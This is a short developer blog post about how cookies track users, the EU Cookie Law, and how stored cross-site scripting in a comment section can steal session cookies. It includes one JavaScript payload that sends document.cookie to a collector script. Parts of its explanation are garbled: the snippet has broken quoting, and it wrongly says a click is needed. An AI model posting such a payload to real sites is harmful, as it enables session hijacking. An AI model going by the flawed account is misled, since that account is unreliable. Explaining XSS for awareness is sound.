Join us

Cookie Tracking and Stealing using Cross-Site Scripting


This article discusses how cookies move around the web and how they can be stolen.

A cookie is a randomly generated alphanumeric string that is generated when you visit a webpage and is sent to your browser by that webpage to be kept as a record of your presence on that website so that you can be recognized by that site when you visit it again because of your previous session(known as a session ID).

But that’s not the only purpose of cookies they are also extensively used to keep a track of your preferences online and they travel from one server to another and can be intercepted and stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.

The Cookie Trail

As stated earlier, when we request a webpage to a server the server contacts that site and renders the webpage to our local machine. While rendering the webpage which is mostly HTML, CSS & some JavaScript along with that it also sends a cookie(1st party cookie) that identifies the session. Besides the website, when we visit a webpage we often see a lot of adverts.

These ads are not part of that website but are being supplied from different servers around the world to the website in exchange for money. Whenever we click one of these ads, it sends back a cookie to its respective server, and the server stores it to keep a track of our preferences.

The servers also communicate with each other and they form an advertising network, sharing your preferences and showing you ads according to those preferences in the future. So you are being tracked and watched by multiple entities online all the time unknowingly.

Keeping this in mind the EU Directive passed something known as “The Cookie Law” according to which the site has to ask for your permission to use cookies. This is why you see a message on a certain site like “This site uses cookies to enhance user experience……” asking for your permission.

The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone, or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and giving them a choice to allow it or not.

Cookie Theft

Shopping preferences might not classify as sensitive information about an individual but online shopping carts and banking details are really sensitive data and all of this is also remembered by a site with the help of session cookies.

If an attacker manages to get a hold of your session cookies then that person will be able to pose as you and that site and will have access to your banking details and your amazon shopping cart and might order stuff from your amazon account to his/her address spending all your money.

This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit that vulnerability.

This is found mostly in badly-coded websites where the developer forgets to include certain security measures to prevent an attacker from running a cross-site script.

How do websites use XSS to steal cookies?

I’m going to explain this with a hypothetical scenario. So let’s say we visit one such vulnerable site which has a comments section on it.

Now on an ideal, secure website, a comment section should only have text in plain English but on an insecure site, if we post a code in the comment section the site would think that it is some code from the server-side and it is supposed to run that code.

document.write('<img src="http://localhost/submitcookie.php? cookie ='+ escape(document.cookie) + '" />);

  • This code when posted in the comments section will trick the browser into thinking that it is Javascript code(due to the script tags) sent by the server and will make it run it.
  • When some user visiting the site looks at the comment section he/she will see a link to an image in the comments section which is the result of the script running.
  • When a user clicks on this link thinking that it is an image (whereas it is a PHP file) they get an image rendered in the comment section. What they don’t know is that this link silently executed a PHP file that grabs their cookie.
  • Now, the cookie which has that user’s session ID is saved in the attacker’s database and the attacker can pose as that user on that site.

Thank you for reading my article

And if you like it give me a follow.

Only registered users can post comments. Please, login or signup.

Start blogging about your favorite technologies, reach more readers and earn rewards!

Join other developers and claim your FAUN account now!


Arth Kumar


Hi I am Arth, A Python and Wix developer Also Interested in Generative Art(intagram:coder_kumar) If you want a good looking personal website Contact Me
User Popularity



Total Hits